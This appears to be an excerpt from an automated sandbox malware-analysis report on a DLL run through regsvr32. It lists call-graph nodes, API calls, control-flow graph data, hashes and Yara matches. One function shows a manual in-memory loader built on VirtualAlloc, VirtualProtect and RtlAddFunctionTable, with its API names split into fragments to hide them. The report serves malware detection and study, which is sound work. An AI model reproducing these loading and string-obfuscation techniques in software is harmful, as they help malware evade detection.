_FF_MSGBANNER 42 API calls 9983->9986 9985 7fffefb96550 _isindst 6 API calls 9985->9983 9987 7fffefb970a6 9986->9987 9989 7fffefb970bf 9987->9989 9990 7fffefb96550 _isindst 6 API calls 9987->9990 9988 7fffefb96550 _isindst 6 API calls 9988->9978 10045 7fffefb9d0b8 9989->10045 9990->9989 9992->9948 10063 7fffefb93310 GetModuleHandleW 9993->10063 10066 7fffefb92d70 GetLastError FlsGetValue 9996->10066 9998 7fffefb967e9 9998->9947 10000 7fffefb9d2b4 9999->10000 10001 7fffefb967e0 _errno 45 API calls 10000->10001 10004 7fffefb9716e 10000->10004 10002 7fffefb9d2d9 10001->10002 10005 7fffefb966d8 DecodePointer 10002->10005 10004->9954 10004->9955 10006 7fffefb96709 10005->10006 10007 7fffefb96723 _invalid_parameter_noinfo 10005->10007 10006->10004 10009 7fffefb96550 10007->10009 10016 7fffefb987a0 10009->10016 10012 7fffefb965ad 10013 7fffefb9660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10012->10013 10014 7fffefb96658 GetCurrentProcess TerminateProcess 10013->10014 10015 7fffefb9664c _invalid_parameter_noinfo 10013->10015 10014->10006 10015->10014 10017 7fffefb96570 RtlCaptureContext 10016->10017 10017->10012 10019 7fffefb97fc7 10018->10019 10020 7fffefb97fd1 10018->10020 10019->10020 10023 7fffefb97ffd 10019->10023 10021 7fffefb967e0 _errno 45 API calls 10020->10021 10022 7fffefb97fd9 10021->10022 10024 7fffefb966d8 _invalid_parameter_noinfo 7 API calls 10022->10024 10025 7fffefb96fa0 10023->10025 10026 7fffefb967e0 _errno 45 API calls 10023->10026 10024->10025 10025->9972 10025->9973 10026->10022 10031 7fffefb9bf22 10027->10031 10028 7fffefb9bf27 10029 7fffefb967e0 _errno 45 API calls 10028->10029 10030 7fffefb9704c 10028->10030 10035 7fffefb9bf51 10029->10035 10030->9978 10030->9988 10031->10028 10031->10030 10033 7fffefb9bf75 10031->10033 10032 7fffefb966d8 _invalid_parameter_noinfo 7 API calls 10032->10030 10033->10030 10034 7fffefb967e0 _errno 45 API calls 10033->10034 10034->10035 10035->10032 10037 7fffefb9be0c 10036->10037 10040 7fffefb9be02 10036->10040 10038 7fffefb967e0 _errno 45 API calls 10037->10038 10039 7fffefb9be14 10038->10039 10042 7fffefb966d8 _invalid_parameter_noinfo 7 API calls 10039->10042 10040->10037 10041 7fffefb9be50 10040->10041 10043 7fffefb97077 10041->10043 10044 7fffefb967e0 _errno 45 API calls 10041->10044 10042->10043 10043->9983 10043->9985 10044->10039 10062 7fffefb92c5c EncodePointer 10045->10062 10064 7fffefb9332a GetProcAddress 10063->10064 10065 7fffefb9333f ExitProcess 10063->10065 10064->10065 10067 7fffefb92dde SetLastError 10066->10067 10068 7fffefb92d96 10066->10068 10067->9998 10069 7fffefb93108 __wtomb_environ 40 API calls 10068->10069 10070 7fffefb92da3 10069->10070 10070->10067 10071 7fffefb92dab FlsSetValue 10070->10071 10072 7fffefb92dd7 10071->10072 10073 7fffefb92dc1 10071->10073 10075 7fffefb93024 free 40 API calls 10072->10075 10074 7fffefb92cbc _set_doserrno 40 API calls 10073->10074 10076 7fffefb92dc8 GetCurrentThreadId 10074->10076 10077 7fffefb92ddc 10075->10077 10076->10067 10077->10067 10079 7fffefb94ed9 10078->10079 10080 7fffefb94ee3 10078->10080 10082 7fffefb94cd4 10079->10082 10080->9861 10106 7fffefb92df4 10082->10106 10089 7fffefb9309c __setargv 45 API calls 10091 7fffefb94d24 __initmbctable 10089->10091 10090 7fffefb94e81 10090->10080 10091->10090 10129 7fffefb94a0c 10091->10129 10094 7fffefb94d5f 10097 7fffefb93024 free 45 API calls 10094->10097 10100 7fffefb94d84 10094->10100 10095 7fffefb94e83 10095->10090 10096 7fffefb94e9c 10095->10096 10098 7fffefb93024 free 45 API calls 10095->10098 10099 7fffefb967e0 _errno 45 API calls 10096->10099 10097->10100 10098->10096 10099->10090 10100->10090 10139 7fffefb96ba0 10100->10139 10107 7fffefb92d70 _set_doserrno 45 API calls 10106->10107 10108 7fffefb92dff 10107->10108 10109 7fffefb92e0f 10108->10109 10145 7fffefb932e0 10108->10145 10111 7fffefb948c0 10109->10111 10112 7fffefb92df4 _getptd 45 API calls 10111->10112 10113 7fffefb948cf 10112->10113 10114 7fffefb948ea 10113->10114 10115 7fffefb96ba0 _lock 45 API calls 10113->10115 10116 7fffefb9496e 10114->10116 10119 7fffefb932e0 _lock 45 API calls 10114->10119 10120 7fffefb948fd 10115->10120 10122 7fffefb9497c 10116->10122 10117 7fffefb94934 10150 7fffefb96a80 LeaveCriticalSection 10117->10150 10119->10116 10120->10117 10121 7fffefb93024 free 45 API calls 10120->10121 10121->10117 10151 7fffefb92534 10122->10151 10125 7fffefb9499c GetOEMCP 10128 7fffefb949ac 10125->10128 10126 7fffefb949c1 10127 7fffefb949c6 GetACP 10126->10127 10126->10128 10127->10128 10128->10089 10128->10090 10130 7fffefb9497c __initmbctable 47 API calls 10129->10130 10131 7fffefb94a33 10130->10131 10132 7fffefb94a3b __initmbctable 10131->10132 10133 7fffefb94a8c IsValidCodePage 10131->10133 10138 7fffefb94ab2 __initmbctable 10131->10138 10328 7fffefb920e0 10132->10328 10133->10132 10135 7fffefb94a9d GetCPInfo 10133->10135 10135->10132 10135->10138 10136 7fffefb94c6f 10136->10094 10136->10095 10318 7fffefb946dc GetCPInfo 10138->10318 10140 7fffefb96bbe 10139->10140 10141 7fffefb96bcf EnterCriticalSection 10139->10141 10456 7fffefb96ab8 10140->10456 10144 7fffefb932e0 _lock 44 API calls 10144->10141 10146 7fffefb97160 _FF_MSGBANNER 44 API calls 10145->10146 10147 7fffefb932ed 10146->10147 10148 7fffefb96f0c _FF_MSGBANNER 44 API calls 10147->10148 10149 7fffefb932f4 DecodePointer 10148->10149 10152 7fffefb9254a 10151->10152 10158 7fffefb925ae 10151->10158 10153 7fffefb92df4 _getptd 45 API calls 10152->10153 10154 7fffefb9254f 10153->10154 10155 7fffefb92587 10154->10155 10159 7fffefb9524c 10154->10159 10157 7fffefb948c0 __initmbctable 45 API calls 10155->10157 10155->10158 10157->10158 10158->10125 10158->10126 10160 7fffefb92df4 _getptd 45 API calls 10159->10160 10161 7fffefb95257 10160->10161 10162 7fffefb95280 10161->10162 10163 7fffefb95272 10161->10163 10164 7fffefb96ba0 _lock 45 API calls 10162->10164 10165 7fffefb92df4 _getptd 45 API calls 10163->10165 10166 7fffefb9528a 10164->10166 10171 7fffefb95277 10165->10171 10173 7fffefb951f4 10166->10173 10170 7fffefb952b8 10170->10155 10171->10170 10172 7fffefb932e0 _lock 45 API calls 10171->10172 10172->10170 10174 7fffefb9523e 10173->10174 10175 7fffefb95202 _set_doserrno localeconv 10173->10175 10177 7fffefb96a80 LeaveCriticalSection 10174->10177 10175->10174 10178 7fffefb94f04 10175->10178 10179 7fffefb94f9b 10178->10179 10182 7fffefb94f22 10178->10182 10180 7fffefb94fee 10179->10180 10181 7fffefb93024 free 45 API calls 10179->10181 10197 7fffefb9501b 10180->10197 10230 7fffefb998a4 10180->10230 10183 7fffefb94fbf 10181->10183 10182->10179 10185 7fffefb94f61 10182->10185 10189 7fffefb93024 free 45 API calls 10182->10189 10186 7fffefb93024 free 45 API calls 10183->10186 10187 7fffefb94f83 10185->10187 10196 7fffefb93024 free 45 API calls 10185->10196 10190 7fffefb94fd3 10186->10190 10192 7fffefb93024 free 45 API calls 10187->10192 10194 7fffefb94f55 10189->10194 10195 7fffefb93024 free 45 API calls 10190->10195 10191 7fffefb95067 10198 7fffefb94f8f 10192->10198 10193 7fffefb93024 free 45 API calls 10193->10197 10206 7fffefb99df8 10194->10206 10200 7fffefb94fe2 10195->10200 10201 7fffefb94f77 10196->10201 10197->10191 10202 7fffefb93024 45 API calls free 10197->10202 10203 7fffefb93024 free 45 API calls 10198->10203 10204 7fffefb93024 free 45 API calls 10200->10204 10222 7fffefb99b68 10201->10222 10202->10197 10203->10179 10204->10180 10207 7fffefb99e01 10206->10207 10220 7fffefb99e87 10206->10220 10208 7fffefb93024 free 45 API calls 10207->10208 10209 7fffefb99e1b 10207->10209 10208->10209 10210 7fffefb99e2d 10209->10210 10212 7fffefb93024 free 45 API calls 10209->10212 10211 7fffefb99e3f 10210->10211 10213 7fffefb93024 free 45 API calls 10210->10213 10214 7fffefb99e51 10211->10214 10215 7fffefb93024 free 45 API calls 10211->10215 10212->10210 10213->10211 10216 7fffefb99e63 10214->10216 10217 7fffefb93024 free 45 API calls 10214->10217 10215->10214 10218 7fffefb99e75 10216->10218 10219 7fffefb93024 free 45 API calls 10216->10219 10217->10216 10218->10220 10221 7fffefb93024 free 45 API calls 10218->10221 10219->10218 10220->10185 10221->10220 10223 7fffefb99b6d 10222->10223 10224 7fffefb99baa 10222->10224 10225 7fffefb99b86 10223->10225 10226 7fffefb93024 free 45 API calls 10223->10226 10224->10187 10227 7fffefb99b98 10225->10227 10228 7fffefb93024 free 45 API calls 10225->10228 10226->10225 10227->10224 10229 7fffefb93024 free 45 API calls 10227->10229 10228->10227 10229->10224 10231 7fffefb9500f 10230->10231 10232 7fffefb998ad 10230->10232 10231->10193 10233 7fffefb93024 free 45 API calls 10232->10233 10234 7fffefb998be 10233->10234 10235 7fffefb93024 free 45 API calls 10234->10235 10236 7fffefb998c7 10235->10236 10237 7fffefb93024 free 45 API calls 10236->10237 10238 7fffefb998d0 10237->10238 10239 7fffefb93024 free 45 API calls 10238->10239 10240 7fffefb998d9 10239->10240 10241 7fffefb93024 free 45 API calls 10240->10241 10242 7fffefb998e2 10241->10242 10243 7fffefb93024 free 45 API calls 10242->10243 10244 7fffefb998eb 10243->10244 10245 7fffefb93024 free 45 API calls 10244->10245 10246 7fffefb998f3 10245->10246 10247 7fffefb93024 free 45 API calls 10246->10247 10248 7fffefb998fc 10247->10248 10249 7fffefb93024 free 45 API calls 10248->10249 10250 7fffefb99905 10249->10250 10251 7fffefb93024 free 45 API calls 10250->10251 10252 7fffefb9990e 10251->10252 10253 7fffefb93024 free 45 API calls 10252->10253 10254 7fffefb99917 10253->10254 10255 7fffefb93024 free 45 API calls 10254->10255 10256 7fffefb99920 10255->10256 10257 7fffefb93024 free 45 API calls 10256->10257 10258 7fffefb99929 10257->10258 10259 7fffefb93024 free 45 API calls 10258->10259 10260 7fffefb99932 10259->10260 10261 7fffefb93024 free 45 API calls 10260->10261 10262 7fffefb9993b 10261->10262 10263 7fffefb93024 free 45 API calls 10262->10263 10264 7fffefb99944 10263->10264 10265 7fffefb93024 free 45 API calls 10264->10265 10266 7fffefb99950 10265->10266 10267 7fffefb93024 free 45 API calls 10266->10267 10268 7fffefb9995c 10267->10268 10269 7fffefb93024 free 45 API calls 10268->10269 10270 7fffefb99968 10269->10270 10271 7fffefb93024 free 45 API calls 10270->10271 10272 7fffefb99974 10271->10272 10273 7fffefb93024 free 45 API calls 10272->10273 10274 7fffefb99980 10273->10274 10275 7fffefb93024 free 45 API calls 10274->10275 10276 7fffefb9998c 10275->10276 10277 7fffefb93024 free 45 API calls 10276->10277 10278 7fffefb99998 10277->10278 10279 7fffefb93024 free 45 API calls 10278->10279 10280 7fffefb999a4 10279->10280 10281 7fffefb93024 free 45 API calls 10280->10281 10282 7fffefb999b0 10281->10282 10283 7fffefb93024 free 45 API calls 10282->10283 10284 7fffefb999bc 10283->10284 10285 7fffefb93024 free 45 API calls 10284->10285 10286 7fffefb999c8 10285->10286 10287 7fffefb93024 free 45 API calls 10286->10287 10288 7fffefb999d4 10287->10288 10289 7fffefb93024 free 45 API calls 10288->10289 10290 7fffefb999e0 10289->10290 10291 7fffefb93024 free 45 API calls 10290->10291 10292 7fffefb999ec 10291->10292 10293 7fffefb93024 free 45 API calls 10292->10293 10294 7fffefb999f8 10293->10294 10295 7fffefb93024 free 45 API calls 10294->10295 10296 7fffefb99a04 10295->10296 10297 7fffefb93024 free 45 API calls 10296->10297 10298 7fffefb99a10 10297->10298 10299 7fffefb93024 free 45 API calls 10298->10299 10300 7fffefb99a1c 10299->10300 10301 7fffefb93024 free 45 API calls 10300->10301 10302 7fffefb99a28 10301->10302 10303 7fffefb93024 free 45 API calls 10302->10303 10304 7fffefb99a34 10303->10304 10305 7fffefb93024 free 45 API calls 10304->10305 10306 7fffefb99a40 10305->10306 10307 7fffefb93024 free 45 API calls 10306->10307 10308 7fffefb99a4c 10307->10308 10309 7fffefb93024 free 45 API calls 10308->10309 10310 7fffefb99a58 10309->10310 10311 7fffefb93024 free 45 API calls 10310->10311 10312 7fffefb99a64 10311->10312 10313 7fffefb93024 free 45 API calls 10312->10313 10314 7fffefb99a70 10313->10314 10315 7fffefb93024 free 45 API calls 10314->10315 10316 7fffefb99a7c 10315->10316 10317 7fffefb93024 free 45 API calls 10316->10317 10317->10231 10319 7fffefb9471e __initmbctable 10318->10319 10320 7fffefb9480a 10318->10320 10339 7fffefb991a0 10319->10339 10322 7fffefb920e0 __initmbctable 8 API calls 10320->10322 10324 7fffefb948aa 10322->10324 10324->10132 10327 7fffefb98e9c __initmbctable 78 API calls 10327->10320 10329 7fffefb920e9 10328->10329 10330 7fffefb920f4 10329->10330 10331 7fffefb923e8 RtlCaptureContext RtlLookupFunctionEntry 10329->10331 10330->10136 10332 7fffefb9242c RtlVirtualUnwind 10331->10332 10333 7fffefb9246d 10331->10333 10334 7fffefb9248f IsDebuggerPresent 10332->10334 10333->10334 10455 7fffefb9460c 10334->10455 10336 7fffefb924ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10337 7fffefb9250c _invalid_parameter_noinfo 10336->10337 10338 7fffefb92516 GetCurrentProcess TerminateProcess 10336->10338 10337->10338 10338->10136 10340 7fffefb92534 _Wcsftime 45 API calls 10339->10340 10341 7fffefb991c4 10340->10341 10349 7fffefb98f34 10341->10349 10344 7fffefb98e9c 10345 7fffefb92534 _Wcsftime 45 API calls 10344->10345 10346 7fffefb98ec0 10345->10346 10408 7fffefb9895c 10346->10408 10350 7fffefb98fc1 10349->10350 10351 7fffefb98f84 GetStringTypeW 10349->10351 10352 7fffefb98f9e 10350->10352 10354 7fffefb990f0 10350->10354 10351->10352 10353 7fffefb98fa6 GetLastError 10351->10353 10355 7fffefb98fea MultiByteToWideChar 10352->10355 10371 7fffefb990e9 10352->10371 10353->10350 10373 7fffefb9e1e8 GetLocaleInfoA 10354->10373 10362 7fffefb99018 10355->10362 10355->10371 10357 7fffefb920e0 __initmbctable 8 API calls 10359 7fffefb947a1 10357->10359 10359->10344 10360 7fffefb9914b GetStringTypeA 10364 7fffefb9916e 10360->10364 10360->10371 10361 7fffefb9903d _Wcsftime __initmbctable 10366 7fffefb990a4 MultiByteToWideChar 10361->10366 10361->10371 10362->10361 10365 7fffefb96c34 realloc 45 API calls 10362->10365 10367 7fffefb93024 free 45 API calls 10364->10367 10365->10361 10368 7fffefb990db 10366->10368 10369 7fffefb990c6 GetStringTypeW 10366->10369 10367->10371 10368->10371 10372 7fffefb93024 free 45 API calls 10368->10372 10369->10368 10371->10357 10372->10371 10374 7fffefb9e21a 10373->10374 10375 7fffefb9e21f 10373->10375 10377 7fffefb920e0 __initmbctable 8 API calls 10374->10377 10404 7fffefb92100 10375->10404 10378 7fffefb9911a 10377->10378 10378->10360 10378->10371 10379 7fffefb9e23c 10378->10379 10380 7fffefb9e28e GetCPInfo 10379->10380 10385 7fffefb9e366 10379->10385 10381 7fffefb9e2a0 10380->10381 10382 7fffefb9e33f MultiByteToWideChar 10380->10382 10381->10382 10384 7fffefb9e2aa GetCPInfo 10381->10384 10382->10385 10388 7fffefb9e2c5 _FF_MSGBANNER 10382->10388 10383 7fffefb920e0 __initmbctable 8 API calls 10386 7fffefb99140 10383->10386 10384->10382 10387 7fffefb9e2bf 10384->10387 10385->10383 10386->10360 10386->10371 10387->10382 10387->10388 10389 7fffefb96c34 realloc 45 API calls 10388->10389 10391 7fffefb9e301 _Wcsftime __initmbctable 10388->10391 10389->10391 10390 7fffefb9e39d MultiByteToWideChar 10392 7fffefb9e3c7 10390->10392 10393 7fffefb9e3ff 10390->10393 10391->10385 10391->10390 10394 7fffefb9e407 10392->10394 10395 7fffefb9e3cc WideCharToMultiByte 10392->10395 10393->10385 10396 7fffefb93024 free 45 API calls 10393->10396 10397 7fffefb9e439 10394->10397 10398 7fffefb9e40d WideCharToMultiByte 10394->10398 10395->10393 10396->10385 10399 7fffefb93108 __wtomb_environ 45 API calls 10397->10399 10398->10393 10398->10397 10400 7fffefb9e446 10399->10400 10400->10393 10401 7fffefb9e44e WideCharToMultiByte 10400->10401 10401->10393 10402 7fffefb9e477 10401->10402 10403 7fffefb93024 free 45 API calls 10402->10403 10403->10393 10405 7fffefb9287c 10404->10405 10406 7fffefb925f8 _wcstoui64_l 67 API calls 10405->10406 10407 7fffefb928a7 10406->10407 10407->10374 10409 7fffefb989b4 LCMapStringW 10408->10409 10413 7fffefb989d8 10408->10413 10410 7fffefb989e4 GetLastError 10409->10410 10409->10413 10410->10413 10411 7fffefb98ca6 10416 7fffefb9e1e8 _wcstoui64 67 API calls 10411->10416 10412 7fffefb98a53 10414 7fffefb98c9f 10412->10414 10415 7fffefb98a71 MultiByteToWideChar 10412->10415 10413->10411 10413->10412 10418 7fffefb920e0 __initmbctable 8 API calls 10414->10418 10415->10414 10426 7fffefb98aa0 10415->10426 10417 7fffefb98cd4 10416->10417 10417->10414 10420 7fffefb98e2f LCMapStringA 10417->10420 10421 7fffefb98cf3 10417->10421 10419 7fffefb947d4 10418->10419 10419->10327 10438 7fffefb98d3b 10420->10438 10423 7fffefb9e23c _wcstoui64 60 API calls 10421->10423 10422 7fffefb98b1c MultiByteToWideChar 10424 7fffefb98c91 10422->10424 10425 7fffefb98b46 LCMapStringW 10422->10425 10428 7fffefb98d0b 10423->10428 10424->10414 10433 7fffefb93024 free 45 API calls 10424->10433 10425->10424 10429 7fffefb98b70 10425->10429 10427 7fffefb96c34 realloc 45 API calls 10426->10427 10430 7fffefb98ad1 _Wcsftime 10426->10430 10427->10430 10428->10414 10431 7fffefb98d13 LCMapStringA 10428->10431 10434 7fffefb98b7b 10429->10434 10437 7fffefb98bb6 10429->10437 10430->10414 10430->10422 10431->10438 10442 7fffefb98d42 10431->10442 10432 7fffefb98e5f 10432->10414 10439 7fffefb93024 free 45 API calls 10432->10439 10433->10414 10434->10424 10436 7fffefb98b92 LCMapStringW 10434->10436 10435 7fffefb93024 free 45 API calls 10435->10432 10436->10424 10441 7fffefb96c34 realloc 45 API calls 10437->10441 10450 7fffefb98bd4 _Wcsftime 10437->10450 10438->10432 10438->10435 10439->10414 10440 7fffefb98c23 LCMapStringW 10443 7fffefb98c44 WideCharToMultiByte 10440->10443 10444 7fffefb98c83 10440->10444 10441->10450 10445 7fffefb96c34 realloc 45 API calls 10442->10445 10447 7fffefb98d63 _Wcsftime __initmbctable 10442->10447 10443->10444 10444->10424 10449 7fffefb93024 free 45 API calls 10444->10449 10445->10447 10446 7fffefb98dc5 LCMapStringA 10451 7fffefb98ded 10446->10451 10452 7fffefb98df1 10446->10452 10447->10438 10447->10446 10449->10424 10450->10424 10450->10440 10451->10438 10454 7fffefb93024 free 45 API calls 10451->10454 10453 7fffefb9e23c _wcstoui64 60 API calls 10452->10453 10453->10451 10454->10438 10455->10336 10457 7fffefb96adf 10456->10457 10458 7fffefb96af6 10456->10458 10459 7fffefb97160 _FF_MSGBANNER 44 API calls 10457->10459 10460 7fffefb9309c __setargv 44 API calls 10458->10460 10470 7fffefb96b0b 10458->10470 10461 7fffefb96ae4 10459->10461 10462 7fffefb96b19 10460->10462 10463 7fffefb96f0c _FF_MSGBANNER 44 API calls 10461->10463 10464 7fffefb96b30 10462->10464 10465 7fffefb96b21 10462->10465 10466 7fffefb96aec 10463->10466 10468 7fffefb96ba0 _lock 44 API calls 10464->10468 10467 7fffefb967e0 _errno 44 API calls 10465->10467 10469 7fffefb9334c realloc 3 API calls 10466->10469 10467->10470 10471 7fffefb96b3a 10468->10471 10469->10458 10470->10141 10470->10144 10472 7fffefb96b72 10471->10472 10473 7fffefb96b43 10471->10473 10474 7fffefb93024 free 44 API calls 10472->10474 10475 7fffefb97ee4 _lock InitializeCriticalSectionAndSpinCount 10473->10475 10476 7fffefb96b61 LeaveCriticalSection 10474->10476 10477 7fffefb96b50 10475->10477 10476->10470 10477->10476 10479 7fffefb93024 free 44 API calls 10477->10479 10480 7fffefb96b5c 10479->10480 10481 7fffefb967e0 _errno 44 API calls 10480->10481 10481->10476 10483 7fffefb9740a EncodePointer 10482->10483 10483->10483 10484 7fffefb9741f 10483->10484 10484->9884 10488 7fffefb972d4 10485->10488 10501 7fffefb93364 10488->10501 10503 7fffefb96d01 10502->10503 10504 7fffefb96d33 realloc 10502->10504 10503->10504 10505 7fffefb96d0f 10503->10505 10506 7fffefb96d4b RtlAllocateHeap 10504->10506 10510 7fffefb96d2f 10504->10510 10507 7fffefb967e0 _errno 44 API calls 10505->10507 10506->10504 10506->10510 10508 7fffefb96d14 10507->10508 10509 7fffefb966d8 _invalid_parameter_noinfo 7 API calls 10508->10509 10509->10510 10510->9888 10513 7fffefb92e21 10512->10513 10541 7fffefb92f42 10512->10541 10514 7fffefb92e3c 10513->10514 10515 7fffefb93024 free 45 API calls 10513->10515 10516 7fffefb92e4a 10514->10516 10517 7fffefb93024 free 45 API calls 10514->10517 10515->10514 10518 7fffefb92e58 10516->10518 10519 7fffefb93024 free 45 API calls 10516->10519 10517->10516 10520 7fffefb92e66 10518->10520 10521 7fffefb93024 free 45 API calls 10518->10521 10519->10518 10522 7fffefb92e74 10520->10522 10523 7fffefb93024 free 45 API calls 10520->10523 10521->10520 10524 7fffefb92e82 10522->10524 10525 7fffefb93024 free 45 API calls 10522->10525 10523->10522 10526 7fffefb92e93 10524->10526 10527 7fffefb93024 free 45 API calls 10524->10527 10525->10524 10528 7fffefb92eab 10526->10528 10529 7fffefb93024 free 45 API calls 10526->10529 10527->10526 10530 7fffefb96ba0 _lock 45 API calls 10528->10530 10529->10528 10531 7fffefb92eb5 10530->10531 10532 7fffefb92ee3 10531->10532 10535 7fffefb93024 free 45 API calls 10531->10535 10544 7fffefb96a80 LeaveCriticalSection 10532->10544 10535->10532 10541->9915 10545 180021c3c 10546 180021c97 10545->10546 10549 180001bdc 10546->10549 10548 180021e38 10551 180001c82 10549->10551 10550 180001d21 CreateProcessW 10550->10548 10551->10550 10552 7fffefb92050 10555 7fffefb51000 10552->10555 10556 7fffefb5101e ExitProcess 10555->10556

                                                                                                                                Executed Functions

                                                                                                                                Function 00C90000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 8 c90000-c90460 call c90aa8 * 2 VirtualAlloc 30 c9048a-c90494 8->30 31 c90462-c90466 8->31 34 c9049a-c9049e 30->34 35 c90a91-c90aa6 30->35 32 c90468-c90488 31->32 32->30 32->32 34->35 36 c904a4-c904a8 34->36 36->35 37 c904ae-c904b2 36->37 37->35 38 c904b8-c904bf 37->38 38->35 39 c904c5-c904d2 38->39 39->35 40 c904d8-c904e1 39->40 40->35 41 c904e7-c904f4 40->41 41->35 42 c904fa-c90507 41->42 43 c90509-c90511 42->43 44 c90531-c90567 GetNativeSystemInfo 42->44 45 c90513-c90518 43->45 44->35 46 c9056d-c90589 VirtualAlloc 44->46 47 c9051a-c9051f 45->47 48 c90521 45->48 49 c9058b-c9059e 46->49 50 c905a0-c905ac 46->50 51 c90523-c9052f 47->51 48->51 49->50 52 c905af-c905b2 50->52 51->44 51->45 54 c905c1-c905db 52->54 55 c905b4-c905bf 52->55 56 c9061b-c90622 54->56 57 c905dd-c905e2 54->57 55->52 59 c90628-c9062f 56->59 60 c906db-c906e2 56->60 58 c905e4-c905ea 57->58 61 c9060b-c90619 58->61 62 c905ec-c90609 58->62 59->60 63 c90635-c90642 59->63 64 c906e8-c906f9 60->64 65 c90864-c9086b 60->65 61->56 61->58 62->61 62->62 63->60 68 c90648-c9064f 63->68 69 c90702-c90705 64->69 66 c90871-c9087f 65->66 67 c90917-c90929 65->67 72 c9090e-c90911 66->72 70 c9092f-c90937 67->70 71 c90a07-c90a1a 67->71 73 c90654-c90658 68->73 74 c906fb-c906ff 69->74 75 c90707-c9070a 69->75 77 c9093b-c9093f 70->77 98 c90a1c-c90a27 71->98 99 c90a40-c90a4a 71->99 72->67 76 c90884-c908a9 72->76 78 c906c0-c906ca 73->78 74->69 79 c90788-c9078e 75->79 80 c9070c-c9071d 75->80 103 c908ab-c908b1 76->103 104 c90907-c9090c 76->104 83 c909ec-c909fa 77->83 84 c90945-c9095a 77->84 81 c9065a-c90669 78->81 82 c906cc-c906d2 78->82 86 c90794-c907a2 79->86 85 c9071f-c90720 80->85 80->86 94 c9066b-c90678 81->94 95 c9067a-c9067e 81->95 82->73 90 c906d4-c906d5 82->90 83->77 96 c90a00-c90a01 83->96 92 c9097b-c9097d 84->92 93 c9095c-c9095e 84->93 97 c90722-c90784 85->97 88 c907a8 86->88 89 c9085d-c9085e 86->89 100 c907ae-c907d4 88->100 89->65 90->60 108 c9097f-c90981 92->108 109 c909a2-c909a4 92->109 105 c9096e-c90979 93->105 106 c90960-c9096c 93->106 107 c906bd-c906be 94->107 110 c9068c-c90690 95->110 111 c90680-c9068a 95->111 96->71 97->97 112 c90786 97->112 113 c90a38-c90a3e 98->113 101 c90a7b-c90a8e 99->101 102 c90a4c-c90a54 99->102 135 c90835-c90839 100->135 136 c907d6-c907d9 100->136 101->35 102->101 115 c90a56-c90a79 RtlAddFunctionTable 102->115 124 c908bb-c908c8 103->124 125 c908b3-c908b9 103->125 104->72 116 c909be-c909bf 105->116 106->116 107->78 117 c90989-c9098b 108->117 118 c90983-c90987 108->118 122 c909ac-c909bb 109->122 123 c909a6-c909aa 109->123 120 c90692-c906a3 110->120 121 c906a5-c906a9 110->121 119 c906b6-c906ba 111->119 112->86 113->99 114 c90a29-c90a35 113->114 114->113 115->101 130 c909c5-c909cb 116->130 117->109 128 c9098d-c9098f 117->128 118->116 119->107 120->119 121->107 129 c906ab-c906b3 121->129 122->116 123->116 132 c908ca-c908d1 124->132 133 c908d3-c908e5 124->133 131 c908ea-c908fe 125->131 137 c90999-c909a0 128->137 138 c90991-c90997 128->138 129->119 139 c909d9-c909e9 VirtualProtect 130->139 140 c909cd-c909d3 130->140 131->104 146 c90900-c90905 131->146 132->132 132->133 133->131 143 c9083b 135->143 144 c90844-c90850 135->144 141 c907db-c907e1 136->141 142 c907e3-c907f0 136->142 137->130 138->116 139->83 140->139 147 c90812-c9082c 141->147 148 c907fb-c9080d 142->148 149 c907f2-c907f9 142->149 143->144 144->100 150 c90856-c90857 144->150 146->103 147->135 152 c9082e-c90833 147->152 148->147 149->148 149->149 150->89 152->136
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243438412.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_c90000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction ID: cd69c516c76a5471ab1842254e0cebf59a5a7ee5fd8670b37b9f8248c4a70d83
                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction Fuzzy Hash: B272D530618B488FDB19DF18C8896B9B7E1FF98305F20462DE89BD7211DB34DA46CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                • API String ID: 0-464535774
                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180007958 Relevance: 9.3, Strings: 7, Instructions: 551COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
